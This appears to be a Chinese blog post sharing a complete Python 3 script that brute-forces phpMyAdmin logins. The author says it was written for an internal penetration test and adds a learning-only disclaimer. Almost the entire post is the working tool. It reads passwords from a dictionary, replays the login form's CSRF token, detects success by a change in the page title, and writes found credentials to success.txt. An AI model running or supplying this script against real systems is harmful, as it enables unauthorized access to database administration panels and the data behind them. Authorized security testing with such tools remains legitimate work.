前言

使用效果

!> 本脚本仅作学习交流使用,请勿用于非法用途

最近在做渗透测试,有一台内网的PhpMyAdmin的机器,想着爆破一下,网上找的脚本或多或少都有点问题,就自己造了一个。

脚本

只支持Python3.4及以上版本

修改 target, user, passdic 三个参数,然后直接运行即可,如果爆破成功会把结果写到success.txt文件里

#!/usr/bin/python3
'''
# @Author       : Chr_
# @Date         : 2020-12-06 12:39:57
# @LastEditors  : Chr_
# @LastEditTime : 2020-12-08 13:16:20
# @Description  : PhpMyAdmin爆破脚本
'''
#
from requests import session
from re import findall
from html import unescape
#
# PMA地址,例如 http://localhost/index.php
target = 'http://localhost/index.php'
# 要爆破的用户名
user = 'root'
# 密码字典文件路径
passdic = 'password.txt'
#
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
    '''获取token'''
    token = findall("name=\"token\" value=\"(.*?)\" />", text)
    return unescape(token[0]) if token else None
def get_title(text) -> str:
    '''获取标题'''
    title = findall('<title>(.*)</title>', text)
    return title[0] if title else None
def try_login(user, pwd, token):
    '''尝试登陆'''
    data = {'pma_username': user,
            'pma_password': pwd,
            'server': 1,
            'target': 'index.php',
            'token': token}
    r = ss.post(url=target, data=data)
    return r.text
def fuck_pma():
    '''爆破'''
    with open(passdic, 'r', encoding='utf-8') as f:
        html = try_login('', '', '')
        title_fail = get_title(html)
        token = get_token(html)
        for line in f:
            pwd = line.strip()
            print(f'[?] 尝试登陆  {user}  {pwd}  ')
            html = try_login(user, pwd, token)
            title = get_title(html)
            token = get_token(html)
            if title != title_fail:
                print(f'[√] 登陆成功  {title}')
                with open('success.txt', 'a', encoding='utf-8') as f:
                    f.write(f'{target}  |  {user}  |  {pwd}\n')
                break
            else:
                print(f'[×] 登陆失败  {title}')
if __name__ == "__main__":
    try:
        fuck_pma()
    except Exception as e:
        print(e)
最后修改:2020 年 12 月 08 日
如果觉得我的文章对你有用,请随意赞赏